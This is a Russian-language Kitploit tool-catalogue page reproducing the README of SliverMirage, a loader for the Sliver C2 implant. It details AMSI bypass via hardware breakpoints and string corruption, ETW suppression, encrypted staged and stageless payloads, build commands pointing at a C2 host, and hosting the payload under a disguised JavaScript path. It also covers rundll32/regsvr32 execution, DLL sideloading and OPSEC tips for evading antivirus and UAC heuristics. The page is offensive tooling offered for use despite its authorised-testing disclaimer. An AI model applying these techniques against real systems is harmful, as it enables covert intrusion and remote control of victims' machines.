Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SliverMirage — Crystal Palace PICO loader for Sliver C2 двухуровневый обход AMSI, подавление ETW, полезные нагрузки, зашифрованные AES-256-CBC, 6 вариантов доставки | Kitploit
Инструменты/GitHubGitHub/daniomass/slivermirage
ЭксплуатацияПост-эксплуатацияАнализ вредоносных программКомандование и УправлениеАнализ Бинарных ФайловRed TeamingРазработка Полезной Нагрузки
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace PICO loader for Sliver C2 двухуровневый обход AMSI, подавление ETW, полезные нагрузки, зашифрованные AES-256-CBC, 6 вариантов доставки

Репозиторий
1545 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SliverMirage

Форк CrystalSliver, расширяющий загрузчик Crystal Palace PICO обходом AMSI в два слоя, глушением ETW и шестью вариантами доставки для Sliver C2.

Что это делает

SliverMirage оборачивает DLL-имплант Sliver через PICO-виртуализацию Crystal Palace, а затем доставляет его через загрузчик, который нейтрализует AMSI и ETW без патчинга amsi.dll или ntdll.dll.

Стек обхода:

СлойТехникаДетали
AMSI L1Порча строк CLRLdrRegisterDllNotification перехватывает загрузку clr.dll, портит AmsiScanBuffer в .rdata до вызова GetProcAddress из CLR
AMSI L2VEH + HWBPVectored Exception Handler на AmsiScanBuffer возвращает E_INVALIDARG
ETWHWBPDR1 на NtTraceControl возвращает STATUS_SUCCESS
Полезная нагрузкаAES-256-CBC + XORРасшифровка через BCrypt, VirtualAlloc(RW) -> VirtualProtect(RX), ноль RWX
ВиртуализацияCrystal Palace PICODLL Sliver работает внутри PICO-процесса, невидимого для пользовательского AV

Варианты

ФорматФайлДоставкаC2 во время выполнения?
exeСтейджед EXEEXE + payload.dat на сайте C2Да (HTTPS)
exe-stagelessБесстейджевый EXEОдин EXEНет
dllБесстейджевая DLLОдна DLLНет
dll-stagedСтейджед DLLDLL + payload.dat на сайте C2Да (HTTPS)
shellcodeСтейджед шеллкод.bin + payload.datДа (HTTPS)
shellcode-stagelessБесстейджевый шеллкодОдин .binНет

Стейджед-варианты загружают зашифрованный PICO во время выполнения с HTTPS-сайта Sliver. EXE/DLL имеет небольшой размер (~20 КБ) и не содержит полезной нагрузки на диске.

Бесстейджевые варианты встраивают зашифрованный PICO на этапе компиляции (двойной слой XOR + AES). Больше размер на диске, но ноль сетевой активности до callback-бикона.

Быстрый старт

Предварительные требования

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 с pefile (pip install pefile)
  • openssl
  • Java 17 (для Crystal Palace — автоматически устанавливается build.sh)

Сборка через build.sh (рекомендуется)

Скрипт сборки автоматически доустанавливает недостающие зависимости (включая Crystal Palace и Java 17) и выполняет полный конвейер: DLL -> Crystal Palace PICO -> шифрование -> компиляция.

root@kitploit:~
# Стейджед EXE (по умолчанию)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Бесстейджевый EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Бесстейджевая DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Стейджед DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Шеллкод (стейджед)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Шеллкод (бесстейджевый)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Опции:

  • --dll <путь> — DLL-имплант Sliver (обязательно)
  • --host <ip> — IP C2-сервера (обязательно для стейджед-форматов)
  • --port <порт> — Порт C2 (по умолчанию: 443)
  • --path <путь> — URL-путь для загрузки полезной нагрузки (по умолчанию: /assets/js/vendor.js)
  • --format <fmt> — Формат вывода (по умолчанию: exe)
  • --export <имя> — Кастомное имя экспортируемой функции DLL

Сборка через Make (вручную)

Если у вас уже есть PICO-блоб Crystal Palace:

root@kitploit:~
# Стейджед EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Бесстейджевый EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Бесстейджевая DLL
make dll PICO=/path/to/implant.crystal.bin

# Все цели
make clean

Развёртывание

Стейджед (EXE или DLL)

  1. Загрузите build/payload.dat на HTTPS-сайт Sliver:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Доставьте build/csvchelper.exe (или .dll) на целевую машину.

Бесстейджевый

Доставка одним файлом. Настройка сайта C2 не требуется.

Способы выполнения DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

Или используйте DLL-сайдлоадинг (переименуйте в имя легитимной DLL, которую загружает целевое приложение).

Экспорты: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Структура проекта

root@kitploit:~
SliverMirage/
  loader/                    # Загрузчик Crystal Palace PICO (из CrystalSliver)
    src/                     # C-исходники загрузчика + ASM драугра
    loader.spec              # Линкер-спецификация Crystal Palace
    pico.spec                # Спецификация генерации PICO
  src/
    stager_remote.c          # Стейджед EXE
    stager_stageless.c       # Бесстейджевый EXE
    stager_remote_dll.c      # Стейджед DLL
    stager_stageless_dll.c   # Бесстейджевая DLL
    stager_debug.c           # Отладочный EXE (диагностика через MessageBox)
  scripts/
    gen_payload.py           # Шифрование AES-256-CBC (стейджед)
    gen_payload_stageless.py # Встраивание AES + XOR (бесстейджевый)
    dll_to_shellcode.py      # Конвертер DLL в шеллкод через sRDI
  resources/
    resource.rc              # Информация о версии (EXE)
    resource_dll.rc          # Информация о версии (DLL)
    manifest.xml             # Манифест asInvoker
  libtcg.x64.zip             # Библиотека TCG для Crystal Palace
  Makefile
  build.sh

Заметки по OPSEC

  • Чистый IAT: только kernel32, advapi32, bcrypt — всё легитимные Windows API
  • Без патчей памяти: обход AMSI/ETW использует аппаратные точки останова, а не VirtualProtect на системных DLL
  • Без RWX: память полезной нагрузки идёт RW -> RX, никогда RWX
  • Подсистема GUI: точка входа WinMain, -mwindows — без мелькания консоли
  • Информация о версии + манифест: встроенный манифест asInvoker подавляет эвристики UAC
  • Контроль энтропии: бесстейджевые полезные нагрузки используют скользящий ключ XOR для снижения энтропии с ~7.8 до ~6.0-6.5
  • Настройте resource.rc / resource_dll.rc под свою легенду прикрытия перед сборкой

Отказ от ответственности

Этот проект предназначен только для авторизованного тестирования безопасности, исследований и образовательных целей. Используйте его исключительно в средах, где у вас есть явное письменное разрешение на проведение пентеста. Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправомерное использование этого программного обеспечения.

Благодарности

  • Crystal Palace от Rasta Mouse — движок PICO-виртуализации
  • CrystalSliver — оригинальная интеграция Crystal Palace + Sliver
  • sRDI от Nick Landers — техника рефлексивной DLL-инъекции в шеллкод

Лицензия

MIT

Скачать инструмент